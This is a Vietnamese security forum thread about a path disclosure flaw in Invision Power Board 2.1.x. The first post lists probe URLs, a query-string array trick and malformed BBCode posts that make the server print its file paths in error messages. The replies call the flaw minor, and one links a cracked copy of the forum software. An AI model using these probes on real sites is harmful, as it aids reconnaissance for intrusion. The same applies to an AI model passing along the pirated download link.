banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Invision Power Board v2.1.x Path Disclosure Vulnerability  XML
  [Announcement]   Invision Power Board v2.1.x Path Disclosure Vulnerability 08/09/2006 01:35:21 (+0700) | #1 | 21468
[Avatar]
baothu
Elite Member

[Minus]    0    [Plus]
Joined: 15/09/2003 02:42:15
Messages: 57
Offline
[Profile] [PM]
Sorry,dont know authors smilie)
Description:
A vulnerability has been reported in Invision Power Board, which can be exploited by malicious people to disclose path of IPB Forum.


http://site.com/IPB/sources/acp_loaders/acp_pages_components.php
http://site.com/IPB/sources/classes/bbcode/class_bbcode.php
http://site.com/IPB/sources/classes/bbcode/class_bbcode_legacy.php
http://site.com/IPB/sources/classes/editor/class_editor_rte.php
http://site.com/IPB/sources/classes/editor/class_editor_std.php
http://site.com/IPB/sources/classes/post/class_post_edit.php
http://site.com/IPB/sources/classes/post/class_post_new.php
http://site.com/IPB/sources/classes/post/class_post_reply.php
http://site.com/IPB/sources/loginauth/convert/auth.php
http://site.com/IPB/sources/loginauth/external/auth.php
http://site.com/IPB/sources/loginauth/internal/auth.php
http://site.com/IPB/sources/loginauth/ldap/auth.php
http://site.com/IPB/sources/sql/mysql_subsm_queries.php
http://site.com/IPB/sources/sql/mysql_queries.php
http://site.com/IPB/sources/sql/mysql_extra_queries.php
http://site.com/IPB/sources/sql/mysql_admin_queries.php

Fatal error: Class 'class_post' not found in /home/home_user/public_html/sources/classes/post/class_post_new.php on line 28
 




http://forums.site.com/index.php?showtopic=1&&st[]=

Fatal error: Unsupported operand types in /home/forumpublic_html/sources/ipsclass.php on line 3025
 



1) Post a new topic.

Content of new topic without wrapping quotes:
Code:
"[quote x='xxxxx'][/quote"

Post.

Click Reply to reply to the post you just posted. (tongue twister?)

Result:

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 32 bytes) in /****/**/***/*****/forums/sources/classes/post/class_post.php on line 2265

2) Post a new topic.

Content of new topic without quotes:
Code:
"[quote][/quote"

Post.

Click Reply to reply to the post you just posted. (tongue twister?)

Result:

Server Error.

Note: If you do not have show errors set to ON you will get either a Server Error or a Network Error.
 
[Up] [Print Copy]
  [Question]   Re: Invision Power Board v2.1.x Path Disclosure Vulnerability 14/09/2006 04:40:53 (+0700) | #2 | 23133
[Avatar]
alexnguyen
Member

[Minus]    0    [Plus]
Joined: 26/06/2006 17:17:20
Messages: 28
Location: Vietnam Network
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
2.1.7 có dính cái này không vậy
[Up] [Print Copy]
  [Question]   Invision Power Board v2.1.x Path Disclosure Vulnerability 28/01/2007 01:11:25 (+0700) | #3 | 38567
[Avatar]
azulgranas
Member

[Minus]    0    [Plus]
Joined: 25/12/2006 19:38:59
Messages: 26
Offline
[Profile] [PM]
Ban nào có thể nói rõ hơn cho mình về cái lỗi này ko.
[Up] [Print Copy]
  [Question]   Invision Power Board v2.1.x Path Disclosure Vulnerability 02/02/2007 05:46:19 (+0700) | #4 | 39471
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
ấy lỗi này giờ ko dùng được với IPB 2.2.1 nữa gòi. Nếu bạn có bug của bản đó có thể share với anh được ko?
[Up] [Print Copy]
  [Question]   Invision Power Board v2.1.x Path Disclosure Vulnerability 04/02/2007 03:52:13 (+0700) | #5 | 39830
HoS
Member

[Minus]    0    [Plus]
Joined: 03/02/2007 15:07:38
Messages: 43
Offline
[Profile] [PM]
Lỗi này ko nguy hiểm, chỉ kiếm thêm được vài thông tin về path thôi
[Up] [Print Copy]
  [Question]   Re: Invision Power Board v2.1.x Path Disclosure Vulnerability 07/02/2007 23:13:30 (+0700) | #6 | 40503
subnetwork
Member

[Minus]    0    [Plus]
Joined: 05/09/2004 06:08:09
Messages: 1666
Offline
[Profile] [PM] [WWW] [Yahoo!]

alexnguyen wrote:
2.1.7 có dính cái này không vậy 


Lấy version mới nhất của Invision Power Board
http://rapidshare.com/files/11151273/IPB221_Nulled_Konsta.rar
Quản lý máy chủ, cài đặt, tư vấn, thiết kế, bảo mật hệ thống máy chủ dùng *nix
http://chamsocmaychu.com
[Up] [Print Copy]
  [Question]   Invision Power Board v2.1.x Path Disclosure Vulnerability 08/02/2007 02:16:41 (+0700) | #7 | 40550
nhutdm
Elite Member

[Minus]    0    [Plus]
Joined: 02/06/2003 12:40:50
Messages: 45
Offline
[Profile] [PM] [WWW]
Chẳng khai thác được gì ngoài tìm path của tài khoản người dùng trên máy chủ... Chán nhỉ?
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|